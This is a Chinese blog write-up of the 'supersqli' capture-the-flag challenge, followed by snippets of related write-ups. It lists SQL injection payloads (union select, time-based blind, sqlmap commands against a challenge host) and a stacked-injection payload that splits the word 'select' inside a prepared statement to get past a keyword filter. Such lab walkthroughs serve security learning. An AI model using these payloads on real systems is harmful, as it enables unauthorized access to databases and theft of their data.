攻防世界supersqli

最新推荐文章于 2024-07-12 15:01:24 发布
最新推荐文章于 2024-07-12 15:01:24 发布
阅读量371 收藏 2
点赞数 1
分类专栏: 攻防世界系列 文章标签: 数据库 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45955869/article/details/130863676
版权

提示:本文24小时在线,如有问题可联系我!

文章目录

前言

提示:攻防世界supersqli

一、sql注入?

基础:
简单过一遍流程吧!

1' or 1=1 -- a   //判断是否存在注入 

1' and 1=2 -- a   //无报错,说明执行了语句

1' order by 2 -- a //判断字段数
1' order by 3 -- a //报错,说明两位

' union select 1,database() -- a   //数据库名

' union select 1,table_name from information_schema.tables where table_schema=database() -- a   //表名,写database()上一步可以省略了

' union select 1,column_name from information_schema.columns where table_schema=database() and table_name ='上面的' -- a   //列名


' union select * form 库.-- a

还记得不。
爆表就出现问题了
在这里插入图片描述
过滤了呗!
报错,盲注呗!浅试一下都不行~。深度盲注:时间盲注呗!
猜数据库长度

1' and if(length(database())=9,sleep(5),1) -- a

???一个一个试?
绝不可能。先试试工具吧!

二、Sqlmap工具

爆库

 python sqlmap.py -u http://61.147.171.105:63091/?inject=1 --dbs

报表

 python sqlmap.py -u http://61.147.171.105:58878/?inject=1 -D supersqli --tables --time-sec=2 --technique=T --level=3

爆不出来。
。。。
试试堆叠注入

3.堆叠注入

爆库

';show database(); -- a

在这里插入图片描述
查表

1';show tables;-- a

在这里插入图片描述
查列名
当纯数字字符串是表名的时候需要加反引号`

';show columns from `1919810931114514`;-- a

在这里插入图片描述
查字段
过滤了select.没办法只能预编译。

';
sEt @sql = CONCAT('se','lect * from `1919810931114514`;');
#进行预编译
prEpare stmt from @sql;
#设置变量
EXECUTE stmt;#
#执行

执行语句

http://61.147.171.105:58878/?inject=%27;sEt%20@sql%20=%20CONCAT(%27se%27,%27lect%20*%20from%20`1919810931114514`;%27);prEpare%20stmt%20from%20@sql;EXECUTE%20stmt;#

在这里插入图片描述

结果

flag{c168d583ed0d4d7196967b28cbd0b5e9}
qq_45955869
关注
专栏目录
攻防世界 supersqli
lzu_lfl的博客
09-15 272
攻防世界 supersqli_WP
supersqli_攻防世界
u014794949
10-23 417
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界supersqli做题思路(堆叠注入,select绕过)
最新发布
2301_80307383的博客
07-12 558
测试可知,words中的id有正常回显,可把flag所在的表和列改名为id所在的表和列。在尝试大小写,双写,加注释也没能绕过select,尝试堆叠注入。prepare用于预备一个语句,并赋予名称,以后可以引用该语句。打开题目,在已知为sql注入时,先测试闭合方式,输入1\。发现报错,接着尝试1' 和 1" 测试出闭合方式为单引号。接着访问1' or 1#即可得到flag。
攻防世界-supersqli
m0_63563528的博客
03-28 527
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
攻防世界——supersqli
weixin_62281892的博客
09-18 1845
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
supersqli-攻防世界
szhangliwenya的博客
03-30 2152
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界 supersqli 解题思路
xj28555的博客
07-14 1542
随便注,初步判断是有注入点的,那我们进入题目 提交一个1试一试 再在1的后面加个单引号试一试 报错了,然后我们判断有几个字段。 回车后正常,但是换成3后就报错了,所以有两个字段。 当我想用联合查询查询用户和数据库的时候 爆出一段正则表达式,发现过滤掉了图中的关键字。然后我寻找绕过点,发现了堆叠注入。 查询表 查询字段 发现flag,然后我们想办法读取flag值。因为select被正则表达式给过滤掉了,所以这里我们就要想一点骚姿势了。刚开始我想..
网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 3378
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 791
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
攻防世界supersqli(堆叠注入)
2302_79800344的博客
04-09 933
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1823
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
攻防世界-supersqli(堆叠注入)
m0_62094846的博客
12-23 2171
输入1正常显示,输入1‘报错,可以判定是注入 输入2可以,3不行,可以知道有2个字段 然后判定回显位 1' union select 1,2# 过滤了挺多东西的,双写select也无法绕过 看了wp,是堆叠注入 查找数据库 ?inject=1';show databases;--+ 查看表 -1';show tables;--+ 查看words表 -1';desc words;--+ 查看1919810931114514表 -1'...
[攻防世界]supersqli
weixin_55466841的博客
04-30 253
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
攻防世界web--supersqli
m0_60715541的博客
10-27 324
一道攻防世界上面的sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值